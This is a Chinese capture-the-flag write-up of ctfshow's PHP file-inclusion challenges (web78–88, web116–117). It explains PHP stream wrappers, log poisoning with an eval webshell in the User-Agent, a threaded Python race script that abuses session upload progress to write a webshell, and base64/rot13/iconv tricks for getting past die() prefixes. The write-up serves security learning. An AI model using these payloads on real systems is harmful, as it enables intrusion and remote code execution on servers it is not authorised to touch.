ctfshow-文件包含(web78-web88/web116-web117)

news2024/11/16 3:43:59

web78

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

判断是否存在file参数 如果存在 将包含这个参数值 文件

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

filter伪协议

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

file=php://filter/convert.base64-encode/resource=flag.php

base64解码即可

data伪协议 简单理解就是执行自定义代码 

c=data://text/plain,<?php system('tac fla?.php');?>

web79

<?php


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

严格一点点 参数值中不能存在php字符

方法一

使用data伪协议 可以不使用正常的php标签 使用段标签即可 然后使用*代替php

file=data://text/plain,<?=system('tac fl*');?>

方法二

GET POST 联合使用

file=data://text/plain,<?=eval($_POST[1]);?>
POST 1=system("tac flag.php");

web80

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

要求更严格了 data协议不能使用了

那就是用日志方式

日志地址

/var/log/nginx/access.log

插入User-Agent值为

<?php eval($_POST[1]);?>

访问 日志地址 post参数1=system("ls"); 查看当前目录下文件有哪些 查看到有个fl0g.php文件

查看fl0g.php文件内容

web81

<?php


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

更严格一点不能使用冒号 但是貌似没影响 与web80同理

web82

参考b站视频以及session包含/反序列化

 参考

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

禁用了. 导致上一题的日志包含也不行了 只能使用session包含了 ,php里面 唯一我们能控制的无后缀的就是session,需要用到到php_session_upload_progress参数,这个参数是为了获得这个文件上传进度的实时参数

这道题没开启session 如何创建session文件呢? 我们如果只要上传一个cookie 键是sessid 值任意 这样提交后 php会在默认session目录中创建一个 sess_aaa的文件 路径基本上为/tmp/sess_aaa  既然有个session相关文件了 服务器也就自动初始化session了

 这么文件名字我们是可以控制的 可以控制aaa  所以这道题如果只能包含无后缀的 那就可以包含这个session的临时文件

现在文件名字 我们控制了 如何控制文件内容呢

控制文件内容我们需要PHP_SESSION_UPLOAD_PROGRESS 这个参数是获取实时文件上传进度的  我们控制这个参数 来写我们指定内容 通过指定该参数的post值 会拼接默认名字写进去(这句话现在不理解 一会回头看一下) 刚刚群主举个例子 如果PHP_SESSION_UPLOAD_PROGRESS值为123 则知道 /tmp/sess_aaa的内容为123

现在前提都准备好了 但是session临时文件在文件全部上传成功后就会被删除 这时需要session竞争  在文件还没被删除的时候 访问到这个文件  简单理解就是 大量的上传同一个文件 持续访问某个session文件  该脚本 就是开启5个多线程  持续的发送 为何要开启多线程呢?正常情况下开启一个线程也是可以的 但是一般都竞争不出来 都是开启进程让提交的速度加大 访问的速度加大

再简单理解这个线程就是 每秒提交1次文件 和访问1次 因为提交的速度特别快 还没等访问呢 文件就被删除了 如果每秒提交1000次文件 和访问1000次 这样就大大加大访问成功的概率这个不代表

访问第500次的时候是访问第500次提交的文件 而是可能访问到的是第400次提交文件时生成的文件

这里我开五个线程很快就能出结果  我试了一下开20个进行 一瞬间就出结果了

import requests
import threading
import io
a=0
url = "http://6db55daa-3871-4fd6-b564-8e6289806146.challenge.ctf.show/"
sessID = 'tzy'
data = {
    "1": "file_put_contents('/var/www/html/8.php', '<?php eval($_POST[2]);?>');"  # read()中需要post的内容
}
def write(session):
    global a
    fileBytes = io.BytesIO(b'a' * 50)#定义一个大小为50kb的文件赋值给fileBytes变量中
    # 解释一下使用while循环的原因 当前函数现在开启了5次线程 也就是说 同时会向服务器提交五次write函数 如果不设置循环 也就相当于同意时间只提交五次函数 就退出程序了
    # 如果在函数内部定义while循环 这样就能做到 持续进行 每次提交五次函数 换位思考也就是说 提交五次函数 每一次都是一个循环 这五个都是循环 也就能做到 持续性多线程
    # 这种方法 和在线程外部加入一个while循环一个意思
    while True:
        if a:
            break
        #使用传进来的session对象执行post提交请求
        res = session.post(url,
                           data={
                               'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'
                               # 改参数的值就是/tmp/sess_tzy文件的内容
                           },
                           cookies={
                               "PHPSESSID": sessID
                           },
                           files={
                               'file': ('tzy.png', fileBytes)
                           }
                           )
        #print(res.request.headers)
        #print(res.request.body)
def read(session):
    global a
    while True:
        res1 = session.post(url + '?file=/tmp/sess_' + sessID, data=data,
                            cookies={
                                "PHPSESSID": sessID
                            })
        res2 = session.get(url + '8.php')
        if res2.status_code == 200:
            print("+++done+++")
            a=1
            break
        else:
            print(res2.status_code)
if __name__ == '__main__':
    # 开启多线程 直接解释代码 python会同时提交五次write函数 和五次read函数
    event = threading.Event()  # 开启多线程的对象
    # 这个session对象 是requests.session()类的实例化
    # request.session 包含 request.request的功能 比如get() post()
    # 而session这个类还可以自动处理cookie 会自动地处理与会话相关的内容,比如 cookies 的保存和发送
    # Session 对象的优势在于它会在整个会话中自动管理 cookies,并在多个请求之间共享 cookies 和会话状态。
    # 这意味着你只需要在第一个请求中设置 cookies,后续的请求会自动使用相同的 cookies
    with requests.session() as session:
        for i in range(5):  # 开5个线程 执行write函数传入session对象最为参数
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()

        event.set()  # 唤醒线程

获得flag

web83

<?php
session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

在程序前销毁session的全部变量 以及全部数据  没影响 我们直接加入cookie服务器识别出来存在session id后自动就初始化session了  同web82一样

web84

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    system("rm -rf /tmp/*");
    include($file);
}else{
    highlight_file(__FILE__);
}

好狗直接把临时目录的文件全部删除了 但是发现不影响呀

本身 session.upload_progress.cleanup = on 会清空对应 session 文件中的内容 

再加上一条删除文件 影响不大 加快请求速度呗 不加快5多线程也行    反正记住就行 无论他删不删对我们都没影响 因为啥就算这个请求执行到删除了 然后执行包含 如果在执行include前0.001s又生成了一个临时文件 她依旧是可以包含的 最坏的情况 无非也就是加快线程呗 加快速度

web85

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    if(file_exists($file)){
        $content = file_get_contents($file);
        if(strpos($content, "<")>0){
            die("error");
        }
        include($file);
    }
    
}else{
    highlight_file(__FILE__);
}

说实话这道题 我挺蒙 哪怕多线程为什么能绕过die呢 每个线程都能匹配到die呀 原来这道题开多线程和上一题开多线程 能成功的原因 不一样 这一道题开5不行 开20可以 是因为 在高并发/高线程的情况下 有个特性就是竞争 而竞争会导致很多的不确定性 比如这道题在执行die的时候 因为多线程抢占资源的原因 可能会导致die还没执行成功呢 include就已经被执行成功了 

web86

<?php
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

定义了文件包含指定目录 也就是说想要包含的文件必须在指定目录下 否则包含不成功

难道还是要利用高线程导致竞争从而还没定义目录位置 就已经执行include了吗? 查看一下其他师傅的wp

结果是是这个原因 include包含的文件如果存在路径 他会按照指定路径查找文件 如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件 没有则在当前文件所在的目录和当前工作目录下寻找 所以不影响我们 线程5应该就可以了 不需要高并发导致的不确定行为 而是普通的和服务器删除速度来竞争 不是高并发的竞争

的确我说对了

注意:早session包含中

这里说一下 提交请求后的请求体是 不是想象的那种post 键值对的形式 而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中 这块的简单知识点 有时间得看看

<!DOCTYPE html>
<html>
<body>
<form action="http://26bfc8ed-f28a-46ef-94a6-bbff5bb92e6b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

web87

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
    
}else{
    highlight_file(__FILE__);
}

参考p神文章

file_put_content和死亡·杂糅代码之缘

方法一使用 过滤器中的base64 解码绕过 将死亡函数进行解码 变为非法字符

file=php://filter/write=convert.base64-decode/resource=hello.php

在base64解码中 每四个字符为一组解码为三个字符 并且只有字母为解码的字符 phpdie为6个 需要在$content前任意添加两个字符 

content=abPD8gcGhwaW5mbygpOz8+

将file参数的值进行url全编码使用bp

从浏览器到服务器 他会自动进行一次解码 为什么要两次编码呢?两点 第一点本身写文件的时候他会解码一次 第二点在过滤的时候 如果不进行二次url编码 他会把关键词换成问好 这两点同时满足 这样两次url编码就可以了 

验证成功 同理 换content的值即可得到flag

方法二使用 过滤器中的rot13 编码绕过 解码绕过 将死亡函数进行解码 变为非法字符

和base64同理 

现将payload进行rot13编码

file=php://filter/write=string.rot13/resource=hello2.php

concent=<?cuc cucvasb();?>

死亡代码<?php die('大佬别秀了');?>已经被解码为<?cuc qvr('大佬别秀了');?>

这里有个问题如果服务器开启了可以使用短标签那么服务器就会解析该短标签了 我们的payload就不会被执行了  就不能使用这种方法了 因为该解码方式不会解码<?等符号 并且会原封不动的写入到文件中

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

使用data伪协议

因为过滤了 php那就使用base编码 有的时候如果base编码后出现= 或者 +号 也会被过滤掉 在后方加入1来混淆

比如

<?php echo `ls`?>和<?php system('ls'); ?> 一个意思

?file=data://text/plain;base64,PD9waHAgZWNobyBgbHNgPz4xMTEx

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwqJyk/PjEx

web116

开局一个视频 无法查看源码 下载视频 使用010打开 搜索各种文件的标头标识 发现 存在PNG文件

PNG图片以IEND结尾 复制粘贴到新建十六进制文件 另存1.PNG

打开图片后

源码文件的意思就是读取一个文件 输出到浏览器中 

在浏览器中虽然不能右键查看源码 但是可以使用view-source:

那就读取 flag.php(只能一个一个尝试)

web117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

不能使用base64和rot13解码绕过了 把一句话木马从UCS-2LE编码转换为UCS-2BE编码。

其实关键的不是两种编码方式(这两个编码方式可以换位置) 这两种编码方式都是一样的 不会改变任何字符 关键的是iconv这个函数 他可以进行两个字符反转一次(切记 需反转的字符必须是2的整数倍 否则报错,如果报错可以通过修改密码 增加字符 或者在后面再加上任意一个字符 反正服务器也不解析)

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[aa]);?>');
echo "payload:".$result."\n";
?>
#?<hp pe@av(l_$OPTSa[]a;)>?

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hello.php

contents=?<hp pe@av(l_$OPTSa[]a;)>?

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2110442.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

智能生成ppt使用什么软件?免费生成软件大盘点

在快节奏的商务交流、生动有趣的课堂教育以及各类激情洋溢的演讲场合中&#xff0c;PPT&#xff08;PowerPoint Presentation&#xff09;无疑是我们不可或缺的信息传递利器。 然而&#xff0c;设计一份既视觉吸睛又能精准传达核心信息的PPT&#xff0c;往往需要耗费大量的时间…

Unity数据持久化 之 一个通过2进制读取Excel并存储的轮子(1)

本文仅作笔记学习和分享&#xff0c;不用做任何商业用途 本文包括但不限于unity官方手册&#xff0c;unity唐老狮等教程知识&#xff0c;如有不足还请斧正​​ 事先声明:该工具我是跟唐老师教程来的&#xff0c;并非原创&#xff0c;仅作学习笔记交流 1.需求分析 最终目的就如…

从供货上游到下游消费者平台搭建 多商家供货供应链商城开发关键点

搭建一个多商家供货的供应链商城、从供货上游到下游消费者的综合供应链平台是一个复杂的事情。但这样的平台能高效地连接供应链的各个环节&#xff0c;还能保证信息的流畅传递和业务的高效运作。今天&#xff0c;商淘云为您分享从供货上游到下游消费者的平台搭建的4大关键点&am…

MLLM(二)| 阿里开源视频理解大模型:Qwen2-VL

2024年8月29日&#xff0c;阿里发布了 Qwen2-VL&#xff01;Qwen2-VL 是基于 Qwen2 的最新视觉语言大模型。与 Qwen-VL 相比&#xff0c;Qwen2-VL 具有以下能力&#xff1a; SoTA对各种分辨率和比例的图像的理解&#xff1a;Qwen2-VL在视觉理解基准上达到了最先进的性能&#…

Qt中使用DAG(有向无环图)

之前做的一个视觉检测项目&#xff0c;本来各个视觉检测工具之间是独立的&#xff0c;单独执行图像输入、得出结果&#xff0c;然后综合汇总结果&#xff0c;简单明了。 后来要求工具之间能存在依赖关系&#xff0c;也就是A工具的输出可以作为B工具的输入&#xff0c;这样就很麻…

【Android】ViewPager基本用法总结

文章目录 一、添加ViewPager控件二、构建适配器类三、在 MainActivity 中设置适配器示例一&#xff1a;图片切换适配器MainActivity 示例二&#xff1a;Fragment切换适配器FragmentMainActivity ViewPager 是 Android 中一个用于在同一屏幕上滑动不同页面&#xff08;通常是左右…

【C++】C++中的花式操作:lambda表达式、类成员初始化列表、三元运算符、运算符及其重载。。。

八、C中的花式操作&#xff1a;lambda表达式、构造函数初始化列表、三元运算符 10、lambda表达式 见mutable关键字&#xff1a;【C】C中的关键字&#xff1a;const、mutable、auto、new....-CSDN博客。 11、构造函数初始化列表 当我们编写一个类时&#xff0c;一般都要有一个…

鼠标指针美化 一大批鼠标指针特效 喜欢的快点收藏~!

鼠标指针美化 一大批鼠标指针特效 喜欢的快点收藏~&#xff01;鼠标指针美化&#xff0c;这个功能可能许多人都没用过&#xff0c;应该还有很多人都是用着系统默认的鼠标指针&#xff0c;我们今天给大家分享一个可以修改鼠标指针的工具&#xff0c;如果你也喜欢&#xff0c;那麻…

类比推理-错题集

001 解析 &#xff1a; 002

[Visual Stuidio 2022使用技巧]3.模板

本文主要介绍本人在使用vs2022开发WPF桌面程序时使用到的一些插件及配置。 语言&#xff1a;C# IDE&#xff1a;Microsoft Visual Studio Community 2022 框架&#xff1a;WPF&#xff0c;.net 8.0 一、工程模板 1.1 创建模板 编辑好模板代码&#xff0c;扩展及NuGet包之…

【2024全国大学生数学建模竞赛】E题 模型建立与求解(含代码与论文)

目录 一、问题重述 1.1 问题背景 1.2 问题回顾与分析 四、问题求解与分析 4.1 问题1求解与分析 4.1.1 问题1分析 4.1.2 问题1建模与求解 按照提交论文的格式进行撰写&#xff01;完整版请看文章最后&#xff01; 一、问题重述 1.1 问题背景 随着城市化进程的加快、机动…

mysql笔记3(数据库和表的基础操作)

文章目录 一、数据库的基础操作1. 显示所有的仓库(数据库)2. 创建数据库注意(命名规范)&#xff1a; 3. 删除数据库4. 查看创建数据库的SQL5. 创建数据库时跟随字符编码6. 修改数据库的字符编码 二、表的基础操作1. 引入表的思维2. 引用数据库3. 查看该数据库下面的表4. 创建表…

微信小程序webgl 显示图片

// wxml <view class"container"><!-- 加载地图容器 --><canvas type"webgl" id"testMap" style"width: 100%; height: 100%;" disable-scroll bindtouchstart"touchStart" bindtouchmove"touchMove&qu…

直播美颜SDK与主播美颜工具:实时美颜技术的深度解析

本篇文章&#xff0c;笔者将深入解析直播美颜SDK的核心技术与主播美颜工具的开发原理。 一、什么是直播美颜SDK&#xff1f; 通过集成美颜SDK&#xff0c;开发者可以在直播应用中快速实现脸部优化、滤镜添加、皮肤调整等功能&#xff0c;帮助主播在直播过程中实时呈现最佳状态…

linux线程cp模型,posix信号量,线程池,线程封装,单例模型,懒汉饿汉实现方式,自旋锁,读者写者模型

1.生产者消费者模型 前面的同步&#xff0c;我们并没有一个很好的场景来模拟同步&#xff0c;只是简单的将有序的现象输出出来&#xff1b;现在我们来讲解一个比较合理且常见的模型——生产者消费者模型&#xff1b; 1.1模型理解 什么是生产者消费者模型&#xff1a; 这个模…

书籍爱好者的福音:Spring Boot实现的个性化推荐

1 绪论 1.1研究背景 随着网络不断的普及发展&#xff0c;图书个性化推荐系统依靠网络技术的支持得到了快速的发展&#xff0c;首先要从学生的实际需求出发&#xff0c;通过了解学生的需求开发出具有针对性的首页、图书信息、好书推荐、留言反馈、个人中心、后台管理功能&#x…

Go Web 编程 PDF

&#x1f4da; Go Web开发必读:《Building Web Applications with Go》PDF资源分享 &#x1f50d; 找寻良久,终于寻得这本珍贵资源!现在我免费分享给大家 你是否正在学习Go语言开发Web应用?是否想要提升Go并发编程能力?这本书绝对不容错过! &#x1f4d6; 关于这本书 《B…

AC访问规则--规则优先级

按照以下进行优先级排序&#xff1a; 1.Specific Rules Have Priority 特定规则是一种关联以下内容的规则&#xff1a; ・通过指定其 AID 或指定隐式选择的应用来关联安全元件应用&#xff0c;并且 ・通过指定其 DeviceAppID 来解释一个设备应用&#xff0c; 通用规则是适用…

力扣1049-最后一块石头的重量II(Java详细题解)

题目链接&#xff1a;1049. 最后一块石头的重量 II - 力扣&#xff08;LeetCode&#xff09; 前情提要&#xff1a; 因为本人最近都来刷dp类的题目所以该题就默认用dp方法来做。 最近刚学完01背包&#xff0c;所以现在的题解都是以01背包问题为基础再来写的。 如果大家不懂…

Xilinx高速接口文档简介

Xilinx的高速资源手册比较详细的介绍的介绍有ug482-GTP&#xff0c;ug486-GTX&#xff0c;ug576-GTH 基本结构资源和原语都大致相同 GTP主要在A系列芯片中 GTX主要在K系列芯片中 XILINX系列中有专用的高速接口资源&#xff0c;这些也是FPGA中最有价值的存在。 这些高速资源被称…